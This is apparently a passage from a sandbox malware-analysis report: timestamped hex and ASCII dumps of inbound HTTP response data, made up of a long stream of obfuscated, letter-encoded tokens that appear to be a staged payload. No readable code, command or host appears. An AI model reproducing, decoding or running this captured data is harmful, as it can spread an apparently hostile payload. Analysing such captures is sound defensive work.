                                                  2021-10-29 18:29:53 UTC1434INData Raw: 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 56 56 20 4e 4e 43 20 59 43 20 72 49 20 59 4e 20 59 72 20 4e 43 4c 20 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4c 20 4e 4e 56 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 49 49 20 57 43 20 59 43 20 72 49 20 72 57 20 59 72 20 4e 4d 20 4d 57 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4e 4d 20 4e 56 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 72 43 20 4d 4d 20 59 43 20 72 49 20 72 49 20 59 72 20 63 4d 20 4e 43 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4c 20 4e 4e 56 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 57 4d 20 72 49 20 59 43 20 72 49 20 72 57 20 59 72 20 56 72 72 20 59 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 59 43 20 4e 56 72 20 56 20 59 72 20 49 72 20 4e 4e 57 20 4e 4e 4d 20
                                                  Data Ascii: Ir NNV NNM NVV NNC YC rI YN Yr NCL rI NNM NCW NNL YC L NNV Yr Ir NNV NNM NII WC YC rI rW Yr NM MW NNM NCW NNL YC NM NV Yr Ir NNY NNM rC MM YC rI rI Yr cM NCI NNM NCW NNL YC L NNV Yr Ir NNV NNM NWM rI YC rI rW Yr Vrr YC NNM NCW NNc YC NVr V Yr Ir NNW NNM
                                                  2021-10-29 18:29:53 UTC1438INData Raw: 4e 63 20 59 4e 20 59 56 20 63 72 20 57 20 4e 63 4d 20 4e 4e 49 20 4e 4e 63 20 4e 43 59 20 4e 4e 4d 20 57 20 56 43 4e 20 59 72 20 63 4c 20 49 43 20 4c 4c 20 4e 4e 43 20 4e 72 63 20 4e 4e 63 20 56 4c 49 20 72 49 20 4e 49 72 20 56 20 49 59 20 4e 4e 72 20 4e 43 43 20 4e 43 59 20 4e 72 43 20 56 4e 20 72 43 20 59 59 20 56 4c 20 49 43 20 4e 57 49 20 49 63 20 4e 43 49 20 4e 4e 56 20 4e 57 20 59 56 20 72 4c 20 4e 4e 49 20 49 59 20 4e 4e 72 20 4e 4e 63 20 4e 43 49 20 4e 49 57 20 4e 4d 20 72 57 20 59 43 20 72 4d 20 49 59 20 56 72 49 20 63 59 20 56 59 20 4e 4e 56 20 56 4d 20 59 56 20 4e 49 72 20 56 20 56 56 20 4e 4e 57 20 57 56 20 4e 43 59 20 4e 72 4e 20 72 4d 20 4e 56 4e 20 59 59 20 4c 4e 20 49 43 20 4e 56 4e 20 59 4c 20 4e 43 49 20 4e 4e 56 20 56 4d 20 59 56 20 56
                                                  Data Ascii: Nc YN YV cr W NcM NNI NNc NCY NNM W VCN Yr cL IC LL NNC Nrc NNc VLI rI NIr V IY NNr NCC NCY NrC VN rC YY VL IC NWI Ic NCI NNV NW YV rL NNI IY NNr NNc NCI NIW NM rW YC rM IY VrI cY VY NNV VM YV NIr V VV NNW WV NCY NrN rM NVN YY LN IC NVN YL NCI NNV VM YV V
                                                  2021-10-29 18:29:53 UTC1442INData Raw: 63 20 63 4c 20 4e 56 4d 20 49 63 20 56 59 43 20 59 4c 20 56 4c 4d 20 4e 56 59 20 4e 56 4c 20 59 43 20 4d 4e 20 4e 4e 49 20 56 4e 56 20 4e 56 4d 20 63 43 20 4e 4e 4e 20 4c 63 20 4e 4e 72 20 4e 4d 63 20 63 4c 20 4e 43 4c 20 49 4e 20 56 4e 4d 20 4e 43 63 20 56 4c 72 20 4e 56 59 20 57 4e 20 59 4c 20 4e 49 72 20 56 20 49 59 20 4e 4e 72 20 56 49 20 4e 43 72 20 4d 72 20 56 72 20 59 4c 20 59 43 20 57 59 20 49 4e 20 4e 4e 43 20 57 59 20 4e 43 72 20 4e 4e 56 20 57 4e 20 59 4c 20 56 63 20 72 59 20 49 4e 20 4e 4e 72 20 56 49 20 4e 43 72 20 56 4e 4e 20 4e 4c 20 59 4c 20 59 43 20 57 59 20 49 4e 20 4e 72 57 20 57 56 20 4e 43 72 20 4e 4e 56 20 57 57 20 59 4c 20 4e 57 57 20 56 20 56 4e 49 20 4e 56 4d 20 72 20 4e 43 72 20 56 59 43 20 63 20 72 57 20 59 43 20 4d 4e 20 49 4e
                                                  Data Ascii: c cL NVM Ic VYC YL VLM NVY NVL YC MN NNI VNV NVM cC NNN Lc NNr NMc cL NCL IN VNM NCc VLr NVY WN YL NIr V IY NNr VI NCr Mr Vr YL YC WY IN NNC WY NCr NNV WN YL Vc rY IN NNr VI NCr VNN NL YL YC WY IN NrW WV NCr NNV WW YL NWW V VNI NVM r NCr VYC c rW YC MN IN
                                                  2021-10-29 18:29:53 UTC1445INData Raw: 20 4d 63 20 4e 4e 43 20 4e 56 72 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 4e 43 20 72 43 20 4c 4e 20 49 4e 20 4e 57 4c 20 4e 4e 4d 20 4c 20 4e 43 63 20 4e 4e 59 20 59 4c 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 59 72 20 4e 43 72 20 56 4e 4e 20 59 43 20 4e 4e 56 20 72 63 20 4e 56 4d 20 49 4e 20 4e 57 4c 20 4e 4e 4d 20 4e 57 20 4e 43 63 20 49 4c 20 59 4c 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 49 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 57 43 20 72 43 20 4e 49 4c 20 49 4e 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4d 4d 20 59 4c 20 4e 72 59 20 59 72 20 63 43 20 4e 4e 43 20 56 59 56 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 4d 72 20 72 43 20 4e 59 4e 20 49 4e 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 72 59 20 59 4c 20 4e 4c 4d 20
                                                  Data Ascii: Mc NNC NVr NCr NWY YC NNC rC LN IN NWL NNM L NCc NNY YL NNL Yr NcV NVY Yr NCr VNN YC NNV rc NVM IN NWL NNM NW NCc IL YL NNL Yr NcV NVY VI NCr NWY YC NWC rC NIL IN rW NNM NYY NVM NMM YL NrY Yr cC NNC VYV NCr NWY YC NMr rC NYN IN rW NNM NYY NVM NrY YL NLM
                                                  2021-10-29 18:29:53 UTC1450INData Raw: 59 20 4e 4e 63 20 4e 56 4c 20 59 43 20 4e 57 49 20 63 4e 20 56 72 63 20 4d 4d 20 4e 56 4e 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 4e 43 20 72 4e 20 59 4d 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 72 57 20 4e 4e 4c 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 4e 59 43 20 4d 4c 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 72 56 20 72 59 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 72 57 20 4e 4e 56 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 59 72 20 4d 72 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 49 20 72 63 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 59 4c 20 4e 4e 59 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 49 63 20 4d 72 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4d 49 20 72 63 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20
                                                  Data Ascii: Y NNc NVL YC NWI cN Vrc MM NVN NNM NYY NVM VNC rN YM Yr NcV NVY NrW NNL YN YC NWI cN NYC ML rW NNM NYY NVM VrV rY NNL Yr NcV NVY NrW NNV YN YC NWI cN Yr Mr rW NNM NYY NVM NI rc NNL Yr NcV NVY YL NNY YN YC NWI cN Ic Mr rW NNM NYY NVM NMI rc NNL Yr NcV NVY
                                                  2021-10-29 18:29:53 UTC1454INData Raw: 59 59 20 4e 56 4d 20 4e 4d 49 20 49 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 4e 4c 20 49 59 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 72 63 20 4e 43 49 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 4e 43 20 49 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 4e 4d 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 56 20 4e 43 57 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4e 72 20 57 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 4e 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 4e 49 56 20 4e 43 57 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 72 63 20 57 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 49 4e 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 4e 72 20 4e 43 57 20 72 57 20 4e 4e 4d 20 4e 59
                                                  Data Ascii: YY NVM NMI I NNL Yr NcV NVY VNL IY YN YC NWI cN Vrc NCI rW NNM NYY NVM VNC I NNL Yr NcV NVY NNM Ir YN YC NWI cN VV NCW rW NNM NYY NVM NNr W NNL Yr NcV NVY VN Ir YN YC NWI cN NIV NCW rW NNM NYY NVM Nrc W NNL Yr NcV NVY NIN Ir YN YC NWI cN VNr NCW rW NNM NY
                                                  2021-10-29 18:29:53 UTC1458INData Raw: 4d 20 72 4d 20 49 72 20 4e 4e 72 20 59 43 20 57 57 20 49 4c 20 72 4c 20 72 49 20 59 43 20 4e 4e 4c 20 57 4e 20 56 56 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 4e 43 4d 20 4c 4c 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 63 43 20 4e 56 72 20 49 4c 20 72 4c 20 72 49 20 59 43 20 56 57 20 49 72 20 49 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 56 4e 20 59 4e 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 63 43 20 4e 43 59 20 56 4e 56 20 72 4c 20 72 49 20 59 43 20 4e 59 20 49 4c 20 49 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 43 20 59 4d 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 72 63 20 4e 43 56 20 49 4d 20 72 4c 20 72 49 20 59 43 20 56 56 72 20 4e 43 4d 20 4e 57 57 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 4e 63 4c 20 4e 4e 72 20 4e 4d 20 72 4d 20 49 72 20 4e
                                                  Data Ascii: M rM Ir NNr YC WW IL rL rI YC NNL WN VVN NCI NCW NNV NCM LL NM rM Ir NNr NcC NVr IL rL rI YC VW Ir IN NCI NCW NNV VN YN NM rM Ir NNr NcC NCY VNV rL rI YC NY IL IN NCI NCW NNV C YM NM rM Ir NNr Nrc NCV IM rL rI YC VVr NCM NWW NCI NCW NNV NcL NNr NM rM Ir N
                                                  2021-10-29 18:29:53 UTC1462INData Raw: 49 20 4e 49 4e 20 59 43 20 72 57 20 59 43 20 56 56 49 20 49 59 20 4e 49 4c 20 4e 4e 4d 20 4e 4e 4e 20 4e 4e 56 20 63 4e 20 59 43 20 56 72 59 20 59 72 20 49 63 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 49 59 20 59 43 20 59 72 20 59 43 20 4c 43 20 49 72 20 57 4d 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 72 43 20 59 56 20 4c 4d 20 59 72 20 56 20 4e 4e 72 20 4e 43 59 20 4e 43 59 20 4e 43 59 20 59 43 20 4e 43 56 20 59 43 20 72 43 20 49 43 20 4e 43 59 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 4e 49 20 59 56 20 72 4d 20 59 72 20 56 20 4e 4e 72 20 49 4d 20 4e 43 59 20 4e 4e 4e 20 59 43 20 4e 43 56 20 59 43 20 4e 49 20 49 43 20 49 4c 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 56 43 20 59 56 20 4e 4d 20 59 72 20 4e 59 59 20 49 57 20 4e 4d 56 20 4d 43 20 4e 4e 4e 20 59 43 20 43 20 59
                                                  Data Ascii: I NIN YC rW YC VVI IY NIL NNM NNN NNV cN YC VrY Yr Ic NNr NCC NNN NIY YC Yr YC LC Ir WM NNM YW NNV rC YV LM Yr V NNr NCY NCY NCY YC NCV YC rC IC NCY NNM YW NNV NI YV rM Yr V NNr IM NCY NNN YC NCV YC NI IC IL NNM YW NNV VC YV NM Yr NYY IW NMV MC NNN YC C Y
                                                  2021-10-29 18:29:53 UTC1466INData Raw: 20 4e 57 20 4e 43 57 20 59 4c 20 59 43 20 49 4d 20 59 43 20 4e 4e 59 20 49 72 20 56 63 20 4e 4e 4d 20 72 43 20 4e 4e 56 20 57 4e 20 72 49 20 4e 4e 57 20 59 72 20 63 56 20 4e 4e 72 20 72 49 20 4e 43 57 20 56 4d 20 59 43 20 4e 4e 4d 20 59 43 20 57 43 20 49 72 20 59 59 20 4e 4e 4d 20 43 20 4e 4e 56 20 4e 4e 57 20 72 49 20 57 56 20 59 72 20 4e 4d 20 4e 4e 72 20 56 63 20 4e 43 57 20 59 4c 20 59 43 20 63 72 20 59 43 20 4e 4e 59 20 49 72 20 4c 20 4e 4e 4d 20 72 43 20 4e 4e 56 20 63 72 20 72 49 20 4e 4e 57 20 59 72 20 4c 57 20 4e 4e 72 20 72 49 20 4e 43 57 20 72 20 59 43 20 4e 4e 4d 20 59 43 20 63 4d 20 49 72 20 59 59 20 4e 4e 4d 20 56 4d 20 4e 4e 56 20 4e 4e 57 20 72 49 20 63 57 20 59 72 20 4e 4d 20 4e 4e 72 20 4e 4c 20 4e 43 57 20 59 4c 20 59 43 20 4d 4c 20 59
                                                  Data Ascii: NW NCW YL YC IM YC NNY Ir Vc NNM rC NNV WN rI NNW Yr cV NNr rI NCW VM YC NNM YC WC Ir YY NNM C NNV NNW rI WV Yr NM NNr Vc NCW YL YC cr YC NNY Ir L NNM rC NNV cr rI NNW Yr LW NNr rI NCW r YC NNM YC cM Ir YY NNM VM NNV NNW rI cW Yr NM NNr NL NCW YL YC ML Y
                                                  2021-10-29 18:29:53 UTC1477INData Raw: 20 4e 4e 20 59 20 49 20 4c 59 20 57 4e 20 4d 72 20 49 4d 20 4e 4e 20 57 49 20 4e 4e 72 20 4d 4d 20 57 4c 20 59 4c 20 4d 20 4e 4e 4c 20 56 20 4e 4e 57 20 4e 43 56 20 72 49 20 4d 4d 20 57 56 20 59 56 20 4e 4e 56 20 56 20 63 20 4e 20 4e 43 4c 20 59 4e 20 59 4e 20 72 4d 20 59 43 20 4e 20 4e 4e 49 20 4e 4e 49 20 4e 4e 72 20 57 49 20 59 56 20 63 59 20 57 43 20 4d 4c 20 72 20 4d 20 56 20 4e 4e 63 20 57 57 20 72 49 20 63 59 20 57 56 20 59 4e 20 72 20 72 49 20 56 20 4e 4e 59 20 57 4d 20 4d 59 20 4d 4e 20 57 56 20 4d 4e 20 43 20 4c 20 4e 4e 56 20 4e 4e 72 20 4e 43 4c 20 72 57 20 63 4d 20 72 63 20 59 43 20 59 20 59 20 72 20 43 20 4e 43 56 20 59 4e 20 63 49 20 49 49 20 4d 43 20 4e 4e 63 20 4e 4e 72 20 4d 20 43 20 56 4e 20 59 56 20 63 57 20 49 49 20 72 57 20 59 20 4e
                                                  Data Ascii: NN Y I LY WN Mr IM NN WI NNr MM WL YL M NNL V NNW NCV rI MM WV YV NNV V c N NCL YN YN rM YC N NNI NNI NNr WI YV cY WC ML r M V NNc WW rI cY WV YN r rI V NNY WM MY MN WV MN C L NNV NNr NCL rW cM rc YC Y Y r C NCV YN cI II MC NNc NNr M C VN YV cW II rW Y N
                                                  2021-10-29 18:29:53 UTC1482INData Raw: 43 20 4e 4e 63 20 4e 4e 4c 20 4e 4e 63 20 4e 4e 56 20 56 4e 20 4d 43 20 4d 63 20 57 43 20 4d 43 20 4e 4e 57 20 57 20 4e 4e 4c 20 4e 4e 72 20 4e 43 4e 20 59 59 20 4d 43 20 49 59 20 72 57 20 4e 4e 59 20 4e 4e 63 20 4e 4e 63 20 56 20 57 49 20 63 59 20 59 59 20 4e 43 57 20 4d 4c 20 4e 4e 49 20 57 20 4e 4e 59 20 4e 4e 56 20 4e 43 4c 20 59 4e 20 72 49 20 57 56 20 63 59 20 4e 4e 59 20 59 20 4e 43 20 4e 4e 72 20 57 4d 20 4d 4e 20 72 49 20 72 4d 20 4d 56 20 4e 4e 59 20 63 20 4e 4e 59 20 4e 4e 59 20 56 4c 20 4d 72 20 59 4e 20 57 4c 20 63 4d 20 4e 4e 63 20 4d 20 4e 4e 59 20 4e 4e 72 20 4e 43 43 20 63 4d 20 72 49 20 49 59 20 4d 4c 20 4e 4e 20 72 20 4e 4e 56 20 59 72 20 57 4d 20 72 49 20 59 59 20 57 72 20 4d 4e 20 4e 43 20 49 20 4e 4e 59 20 4d 20 4e 43 57 20 63 57 20
                                                  Data Ascii: C NNc NNL NNc NNV VN MC Mc WC MC NNW W NNL NNr NCN YY MC IY rW NNY NNc NNc V WI cY YY NCW ML NNI W NNY NNV NCL YN rI WV cY NNY Y NC NNr WM MN rI rM MV NNY c NNY NNY VL Mr YN WL cM NNc M NNY NNr NCC cM rI IY ML NN r NNV Yr WM rI YY Wr MN NC I NNY M NCW cW
                                                  2021-10-29 18:29:53 UTC1498INData Raw: 4d 20 57 56 20 57 72 20 49 4d 20 63 49 20 56 4e 20 43 20 4e 49 20 4e 43 57 20 4c 59 20 49 4d 20 49 4e 20 63 72 20 49 59 20 63 43 20 4e 4e 72 20 59 63 20 4e 56 20 72 20 49 4e 20 49 49 20 59 43 20 4e 4e 4c 20 72 57 20 63 20 59 63 20 57 20 63 57 20 4e 56 56 20 49 4e 20 63 59 20 57 72 20 49 72 20 72 57 20 56 63 20 43 20 43 20 4d 4e 20 63 49 20 49 4d 20 4e 56 63 20 59 4c 20 4e 20 56 57 20 4e 43 57 20 63 4e 20 49 4c 20 63 49 20 57 43 20 59 72 20 4c 63 20 43 20 56 63 20 4e 4e 20 56 59 20 57 72 20 49 59 20 57 49 20 49 4d 20 4c 56 20 56 63 20 4e 4e 4d 20 72 56 20 56 4e 20 4d 43 20 4e 4e 49 20 57 4c 20 57 43 20 72 49 20 56 4c 20 4d 20 63 4e 20 4e 4d 20 4d 43 20 49 49 20 59 43 20 63 49 20 59 57 20 56 57 20 4e 20 63 4e 20 4e 4d 20 4d 43 20 49 49 20 59 43 20 4d 43 20
                                                  Data Ascii: M WV Wr IM cI VN C NI NCW LY IM IN cr IY cC NNr Yc NV r IN II YC NNL rW c Yc W cW NVV IN cY Wr Ir rW Vc C C MN cI IM NVc YL N VW NCW cN IL cI WC Yr Lc C Vc NN VY Wr IY WI IM LV Vc NNM rV VN MC NNI WL WC rI VL M cN NM MC II YC cI YW VW N cN NM MC II YC MC
                                                  2021-10-29 18:29:53 UTC1509INData Raw: 63 20 56 59 20 72 20 57 4e 20 57 72 20 49 59 20 63 57 20 49 72 20 59 4c 20 4e 63 20 56 59 20 4c 59 20 49 4e 20 49 4e 20 57 56 20 4e 4e 57 20 4c 49 20 56 4e 20 63 20 4e 43 57 20 4c 63 20 63 72 20 4d 4c 20 4e 4e 4d 20 49 4c 20 4c 56 20 59 4e 20 4d 20 4e 43 20 4c 20 59 43 20 49 4e 20 63 72 20 49 4e 20 4c 57 20 4e 4e 72 20 4e 49 20 49 20 72 20 4e 43 57 20 57 63 20 49 4c 20 63 57 20 4c 57 20 56 4c 20 4e 4d 20 63 4e 20 4e 4d 20 4d 43 20 49 49 20 63 59 20 59 72 20 4c 57 20 56 4c 20 4e 20 59 43 20 4c 56 20 49 4c 20 63 4d 20 63 59 20 49 4c 20 72 49 20 4c 72 20 56 43 20 56 59 20 56 72 20 63 59 20 72 49 20 4e 4e 63 20 57 59 20 59 49 20 56 56 20 4c 4d 20 4e 56 20 72 20 57 43 20 63 4d 20 59 43 20 49 72 20 4c 49 20 56 57 20 56 20 4c 43 20 56 4e 20 63 72 20 57 63 20 49
                                                  Data Ascii: c VY r WN Wr IY cW Ir YL Nc VY LY IN IN WV NNW LI VN c NCW Lc cr ML NNM IL LV YN M NC L YC IN cr IN LW NNr NI I r NCW Wc IL cW LW VL NM cN NM MC II cY Yr LW VL N YC LV IL cM cY IL rI Lr VC VY Vr cY rI NNc WY YI VV LM NV r WC cM YC Ir LI VW V LC VN cr Wc I
                                                  2021-10-29 18:29:53 UTC1525INData Raw: 4d 59 20 72 49 20 59 43 20 72 4c 20 4e 4c 20 4e 4e 72 20 56 43 20 4e 43 57 20 4c 43 20 59 43 20 49 72 20 59 43 20 49 4c 20 49 72 20 4e 43 20 4e 4e 4d 20 72 57 20 4e 4e 56 20 4e 43 4d 20 72 49 20 49 4c 20 59 72 20 56 4e 20 4e 4e 72 20 4e 4d 20 4e 43 57 20 56 43 20 59 43 20 57 59 20 59 43 20 49 49 20 49 72 20 4e 4e 72 20 4e 43 43 20 59 4d 20 4e 4e 56 20 57 4c 20 72 49 20 57 4d 20 59 72 20 4c 56 20 4e 4e 72 20 4d 20 4e 43 57 20 56 59 20 59 43 20 57 72 20 59 43 20 49 4e 20 49 72 20 4e 4e 72 20 4e 4e 72 20 4e 56 20 4e 4e 56 20 63 59 20 72 49 20 49 72 20 59 72 20 49 72 20 57 57 20 57 59 20 4e 43 57 20 4d 20 59 43 20 49 4e 20 59 43 20 57 43 20 49 72 20 4c 43 20 4e 4e 4d 20 49 20 4e 4e 56 20 4d 43 20 72 49 20 56 72 20 59 72 20 49 72 20 4e 4e 4c 20 4e 56 4d 20 4e
                                                  Data Ascii: MY rI YC rL NL NNr VC NCW LC YC Ir YC IL Ir NC NNM rW NNV NCM rI IL Yr VN NNr NM NCW VC YC WY YC II Ir NNr NCC YM NNV WL rI WM Yr LV NNr M NCW VY YC Wr YC IN Ir NNr NNr NV NNV cY rI Ir Yr Ir WW WY NCW M YC IN YC WC Ir LC NNM I NNV MC rI Vr Yr Ir NNL NVM N
                                                  2021-10-29 18:29:53 UTC1541INData Raw: 57 63 20 56 72 59 20 4e 57 63 20 4e 56 43 20 4c 57 20 4c 72 20 4e 4d 49 20 4e 72 4d 20 49 59 20 57 63 20 56 72 59 20 56 56 4e 20 4e 4e 57 20 4c 57 20 4c 72 20 4d 20 59 59 20 4d 43 20 56 72 56 20 4e 57 4d 20 4e 43 4e 20 4e 43 4e 20 4c 56 20 4e 4d 63 20 4e 59 4e 20 59 59 20 4d 43 20 56 72 56 20 56 56 4e 20 4e 43 63 20 4e 43 4e 20 4c 56 20 59 20 59 4e 20 4c 63 20 56 4e 56 20 56 4e 49 20 4e 56 4d 20 4d 4d 20 4e 4e 72 20 72 4d 20 4c 72 20 4e 4d 49 20 4e 59 57 20 57 43 20 57 57 20 56 72 59 20 4e 57 56 20 49 4c 20 59 4c 20 59 4d 20 4c 57 20 4c 63 20 4e 56 4e 20 4e 4e 59 20 4e 43 4c 20 56 4c 63 20 4e 4e 56 20 72 4d 20 4c 72 20 4e 4d 49 20 4e 59 72 20 57 56 20 57 63 20 56 72 59 20 4e 57 4c 20 4e 43 4e 20 4c 56 20 59 20 59 4e 20 4c 63 20 56 4e 56 20 56 4e 49 20 4e
                                                  Data Ascii: Wc VrY NWc NVC LW Lr NMI NrM IY Wc VrY VVN NNW LW Lr M YY MC VrV NWM NCN NCN LV NMc NYN YY MC VrV VVN NCc NCN LV Y YN Lc VNV VNI NVM MM NNr rM Lr NMI NYW WC WW VrY NWV IL YL YM LW Lc NVN NNY NCL VLc NNV rM Lr NMI NYr WV Wc VrY NWL NCN LV Y YN Lc VNV VNI N
                                                  2021-10-29 18:29:53 UTC1557INData Raw: 43 20 49 72 20 4e 4e 4e 20 4e 4e 56 20 4e 43 72 20 49 49 20 59 43 20 4c 4c 20 4e 4d 49 20 56 4e 49 20 49 4e 20 57 43 20 4e 4e 4d 20 4e 56 4d 20 56 72 43 20 4e 57 49 20 59 4c 20 56 63 20 59 72 20 4d 43 20 56 72 4c 20 4e 43 4e 20 4e 43 72 20 49 49 20 59 43 20 4c 72 20 4e 4d 57 20 59 72 20 49 4d 20 57 43 20 4e 4e 4d 20 4e 4e 4c 20 4e 56 43 20 59 4e 20 72 49 20 59 49 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 43 20 59 4e 20 72 49 20 59 4e 20 59 72 20 43 20 4e 4e 56 20 57 57 20 59 49 20 56 20 49 4c 20 63 72 20 4e 56 72 20 49 57 20 59 49 20 59 59 20 4e 4c 20 4e 72 20 56 4e 20 63 63 20 63 49 20 57 4e 20 49 57 20 59 49 20 4c 49 20 56 57 20 4c 4e 20 4c 4e 20 63 57 20 63 4d 20 59 4e 20 63 56 20 49 59 20 4e 4e 72 20 4e 4e 57 20 4e 43 57 20 4e 4e
                                                  Data Ascii: C Ir NNN NNV NCr II YC LL NMI VNI IN WC NNM NVM VrC NWI YL Vc Yr MC VrL NCN NCr II YC Lr NMW Yr IM WC NNM NNL NVC YN rI YI Yr Ir NNr NNM NCW NNC YN rI YN Yr C NNV WW YI V IL cr NVr IW YI YY NL Nr VN cc cI WN IW YI LI VW LN LN cW cM YN cV IY NNr NNW NCW NN
                                                  2021-10-29 18:29:53 UTC1573INData Raw: 4e 43 43 20 49 72 20 56 4d 20 4e 4e 4d 20 59 59 20 4e 4e 56 20 57 56 20 72 49 20 4e 4e 56 20 59 72 20 59 63 20 4e 4e 72 20 72 4d 20 4e 43 57 20 4c 57 20 59 43 20 57 56 20 59 43 20 49 57 20 49 72 20 72 43 20 4e 4e 4d 20 72 56 20 4e 4e 56 20 4d 43 20 72 49 20 57 4e 20 59 72 20 59 4c 20 4e 4e 72 20 4c 72 20 4e 43 57 20 56 72 20 59 43 20 63 49 20 59 43 20 49 72 20 49 72 20 63 59 20 4e 4e 4d 20 72 4d 20 4e 4e 56 20 63 72 20 72 49 20 4e 43 4d 20 59 72 20 59 4d 20 4e 4e 72 20 59 20 4e 43 57 20 72 20 59 43 20 49 56 20 59 43 20 72 20 49 72 20 4d 59 20 4e 4e 4d 20 56 72 20 4e 4e 56 20 4e 43 72 20 72 49 20 57 59 20 59 72 20 4e 49 20 4e 4e 72 20 43 20 4e 43 57 20 4e 49 20 59 43 20 4e 4e 57 20 59 43 20 4e 56 72 20 49 72 20 4c 4e 20 4e 4e 4d 20 59 56 20 4e 4e 56 20 43
                                                  Data Ascii: NCC Ir VM NNM YY NNV WV rI NNV Yr Yc NNr rM NCW LW YC WV YC IW Ir rC NNM rV NNV MC rI WN Yr YL NNr Lr NCW Vr YC cI YC Ir Ir cY NNM rM NNV cr rI NCM Yr YM NNr Y NCW r YC IV YC r Ir MY NNM Vr NNV NCr rI WY Yr NI NNr C NCW NI YC NNW YC NVr Ir LN NNM YV NNV C
                                                  2021-10-29 18:29:53 UTC1589INData Raw: 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d
                                                  Data Ascii: NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM
